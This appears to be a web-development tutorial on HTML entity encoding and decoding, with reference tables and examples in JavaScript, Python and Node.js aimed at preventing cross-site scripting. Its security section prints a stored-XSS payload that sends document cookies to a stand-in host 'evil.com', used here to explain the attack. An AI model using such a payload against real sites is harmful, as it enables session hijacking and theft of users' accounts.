HTML Entity Encoder/Decoder: Complete Guide for Web Developers
HTML entities are special codes that represent characters with special meaning in HTML — like <, >, &, and ". Encoding them correctly is essential for both correctness and security.
Try the DevPlaybook HTML Entity Encoder →
What Are HTML Entities?
HTML entities are string representations of characters that would otherwise be interpreted as HTML markup. They start with & and end with ;.
<!-- Without encoding — browser parses as HTML tag -->
<p>The formula is: a < b && b > c</p> <!-- Broken! -->
<!-- With encoding — renders correctly -->
<p>The formula is: a &lt; b &amp;&amp; b &gt; c</p>
Common HTML Entities Reference
| Character | Entity Name | Entity Number | Use Case |
|---|---|---|---|
| < | &lt; | &#60; | Less-than sign, opening tag |
| > | &gt; | &#62; | Greater-than sign, closing tag |
| & | &amp; | &#38; | Ampersand |
| " | &quot; | &#34; | Double quote in attribute values |
| ' | &apos; | &#39; | Single quote / apostrophe |
| (space) | &nbsp; | &#160; | Non-breaking space |
| © | &copy; | &#169; | Copyright symbol |
| ® | &reg; | &#174; | Registered trademark |
| ™ | &trade; | &#8482; | Trademark symbol |
| € | &euro; | &#8364; | Euro sign |
| → | &rarr; | &#8594; | Right arrow |
| — | &mdash; | &#8212; | Em dash |
When to Encode HTML
User-generated content: Any text from users (comments, names, bios) must be HTML-encoded before inserting into the DOM. Failing to do this opens you up to XSS (Cross-Site Scripting) attacks.
Dynamic content in templates: When inserting dynamic values into HTML templates, always encode unless you explicitly want to allow HTML markup.
Code examples in documentation: Showing code samples with <, >, or & characters in HTML requires entity encoding.
Emails (HTML): HTML emails should encode special characters in content to avoid rendering issues across email clients.
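One way to make "always encode dynamic values in templates" the default is a tagged template that escapes every interpolated value. The sketch below is illustrative only: `escapeHTML` and `html` are hypothetical helper names, not part of any library, and the approach assumes values land in text or quoted-attribute positions.

```javascript
// Hypothetical helper: escapes the five characters that matter in HTML text and attributes.
function escapeHTML(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical tagged template: literal parts pass through, interpolated values are escaped.
function html(strings, ...values) {
  return strings.reduce(
    (out, chunk, i) => out + chunk + (i < values.length ? escapeHTML(values[i]) : ''),
    ''
  );
}

const name = '<img src=x onerror=alert(1)>';
const markup = html`<p>Hello, ${name}!</p>`;
console.log(markup);
// <p>Hello, &lt;img src=x onerror=alert(1)&gt;!</p>
```

Because the escaping happens inside the tag function, forgetting to call it at an individual call site is no longer possible; opting out would need a separate, explicit mechanism.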
HTML Encoding in JavaScript
// Encode HTML with the DOM (browser only)
function encodeHTML(str) {
  const div = document.createElement('div');
  div.textContent = str; // Stored as plain text, never parsed as markup
  return div.innerHTML;  // Serializing escapes &, < and >, but not quotes
}
// Or manually (works anywhere and also escapes quotes):
function escapeHTML(str) {
  return str
    .replace(/&/g, '&amp;') // Must run first so later entities are not double-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
// Usage
const userInput = '<script>alert("xss")</script>';
const safe = escapeHTML(userInput);
document.getElementById('output').innerHTML = safe;
// Displays literal text, doesn't execute script
Decoding HTML Entities in JavaScript
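function decodeHTML(str) {
  // DOMParser builds an inert document, so scripts and event handlers in str do not run
  // (assigning untrusted input to div.innerHTML can fire handlers such as onerror)
  const doc = new DOMParser().parseFromString(str, 'text/html');
  return doc.documentElement.textContent;
}
decodeHTML('&lt;b&gt;Bold&lt;/b&gt;');
// Returns: '<b>Bold</b>'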
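The DOM-based decoder above only works in a browser. As a rough sketch of what decoding involves when no DOM is available, the following handles numeric entities plus a handful of named ones in a single pass. `decodeBasicEntities` and its small `NAMED` table are hypothetical and deliberately incomplete; a full named-entity table is far larger.

```javascript
// Hypothetical, deliberately small table of named entities.
const NAMED = new Map([
  ['amp', '&'], ['lt', '<'], ['gt', '>'],
  ['quot', '"'], ['apos', "'"], ['nbsp', '\u00A0'],
]);

// Decodes &name;, &#NNN; and &#xHHH; in one pass so "&amp;lt;" becomes "&lt;", not "<".
function decodeBasicEntities(str) {
  return str.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (match, body) => {
    if (body[0] === '#') {
      const isHex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(body.slice(isHex ? 2 : 1), isHex ? 16 : 10);
      // Leave out-of-range references untouched instead of throwing.
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    // Unknown names are returned unchanged.
    return NAMED.has(body) ? NAMED.get(body) : match;
  });
}

console.log(decodeBasicEntities('&lt;b&gt;Bold&lt;/b&gt;')); // <b>Bold</b>
console.log(decodeBasicEntities('&amp;lt;'));                // &lt;
console.log(decodeBasicEntities('&#169; &#xA9;'));           // © ©
```

The single `replace` call matters: chaining one replacement per entity would decode `&amp;lt;` twice and silently change the text.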
HTML Encoding in Python
import html
# Encode
text = '<script>alert("xss")</script>'
safe = html.escape(text)
print(safe)
# &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
# Encode with quote=False (doesn't escape quotes — use in text nodes only)
html.escape(text, quote=False)
# Decode
encoded = '&lt;b&gt;Hello &amp; world&lt;/b&gt;'
decoded = html.unescape(encoded)
print(decoded)
# <b>Hello & world</b>
HTML Encoding in Node.js
// Using the 'he' library (highly recommended)
// npm install he
const he = require('he');
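// Encode (useNamedReferences emits &lt; rather than the default hex form &#x3C;)
he.encode('<p>Hello & "world"</p>', { useNamedReferences: true });
// '&lt;p&gt;Hello &amp; &quot;world&quot;&lt;/p&gt;'
// Decode
he.decode('&lt;p&gt;Hello&lt;/p&gt;');
// '<p>Hello</p>'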
// The 'he' library handles all named + numeric entities correctly
Security: HTML Encoding and XSS Prevention
HTML encoding is your first line of defense against Cross-Site Scripting (XSS) attacks.
Stored XSS scenario:
1. Attacker submits: <script>fetch('https://evil.com?cookie='+document.cookie)</script>
2. App stores raw text in database
3. App renders without encoding: innerHTML = rawValue
4. Every user who views the page runs the attacker's script
Prevention:
// UNSAFE — direct innerHTML with user content
element.innerHTML = userComment; // ❌ XSS vulnerability
// SAFE — textContent or encoded innerHTML
element.textContent = userComment; // ✅ Auto-encodes
element.innerHTML = escapeHTML(userComment); // ✅ Manually encoded
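The same rule applies when a user value ends up inside an attribute, where escaping quotes is what keeps the value from breaking out. The sketch below runs in Node without a DOM; `escapeHTML` mirrors the manual function shown earlier, while `renderInput` and the payload are hypothetical examples.

```javascript
function escapeHTML(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical helper: builds an <input> whose value comes from user data.
function renderInput(value, escape) {
  return '<input type="text" value="' + escape(value) + '">';
}

// Contains no < or >, so escaping only angle brackets would not stop it.
const payload = '" onfocus="alert(1)" autofocus="';

const unsafe = renderInput(payload, (s) => s);
const safe = renderInput(payload, escapeHTML);

console.log(unsafe);
// <input type="text" value="" onfocus="alert(1)" autofocus="">
console.log(safe);
// <input type="text" value="&quot; onfocus=&quot;alert(1)&quot; autofocus=&quot;">
```

In the unsafe output the payload closes the `value` attribute and adds its own event handler; in the safe output it stays a single attribute value.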
React's automatic escaping:
React JSX escapes all values by default, so <p>{userInput}</p> is safe. The dangerouslySetInnerHTML prop bypasses this — use it only with sanitized content.
Numeric vs Named Entities
HTML supports two entity formats, named and numeric, and numeric entities can be written in decimal or hexadecimal:
<!-- Named entity (more readable) -->
&copy; &lt; &amp;
<!-- Numeric decimal entity -->
&#169; &#60; &#38;
<!-- Numeric hexadecimal entity -->
&#xA9; &#x3C; &#x26;
All three represent the same characters. Named entities are preferred for readability. Numeric entities work for any Unicode character.
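Since a numeric entity is just the character's Unicode code point, it can be generated for any character. A minimal sketch, assuming a hypothetical helper named `toNumericEntities`:

```javascript
// Hypothetical helper: converts every character of a string to a numeric entity.
function toNumericEntities(str, { hex = false } = {}) {
  // Array.from iterates by code point, so characters outside the BMP (emoji) stay intact.
  return Array.from(str, (ch) => {
    const cp = ch.codePointAt(0);
    return hex ? `&#x${cp.toString(16).toUpperCase()};` : `&#${cp};`;
  }).join('');
}

console.log(toNumericEntities('©<&'));                // &#169;&#60;&#38;
console.log(toNumericEntities('©<&', { hex: true })); // &#xA9;&#x3C;&#x26;
console.log(toNumericEntities('😀'));                 // &#128512;
```

The last line shows a character that has no named entity but still has a numeric one.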
When to Use &nbsp;
&nbsp; (non-breaking space) prevents a line break between two words. Use it sparingly:
<!-- Keep "10 AM" from breaking across lines -->
Meeting at 10&nbsp;AM
<!-- Keep a number and its unit together -->
Distance: 42&nbsp;km
<!-- Avoid using &nbsp; for layout spacing; use CSS padding/margin instead -->
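When such strings are built in code rather than written by hand, the non-breaking space can be inserted as the character U+00A0 and turned into the entity only at output time. A small sketch with two hypothetical helpers, `withUnit` and `encodeNbsp`:

```javascript
const NBSP = '\u00A0'; // the character that the non-breaking space entity decodes to

// Hypothetical helper: glue a number to its unit so the two never wrap apart.
function withUnit(value, unit) {
  return `${value}${NBSP}${unit}`;
}

// Hypothetical helper: replace literal non-breaking spaces with the named entity for markup output.
function encodeNbsp(str) {
  return str.replace(/\u00A0/g, '&nbsp;');
}

const label = withUnit(42, 'km');
console.log(label.length);      // 5
console.log(encodeNbsp(label)); // 42&nbsp;km
```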
Tools for HTML Entity Encoding
Browser-based: DevPlaybook HTML Entity Encoder — paste text and get encoded output instantly.
CLI:
# Python one-liner
python3 -c "import html, sys; print(html.escape(sys.stdin.read()))"
# Pipe file content
cat input.txt | python3 -c "import html, sys; print(html.escape(sys.stdin.read()))"
npm package:
npm install -g he
echo '<b>Hello</b>' | he --encode
Conclusion
HTML entity encoding is fundamental to web security and correctness. Always encode user-generated content before inserting it into HTML. When you need to encode programmatically, use a well-tested routine such as Python's html.escape or the he package, and rely on framework-level escaping (React, Vue, Angular) whenever possible.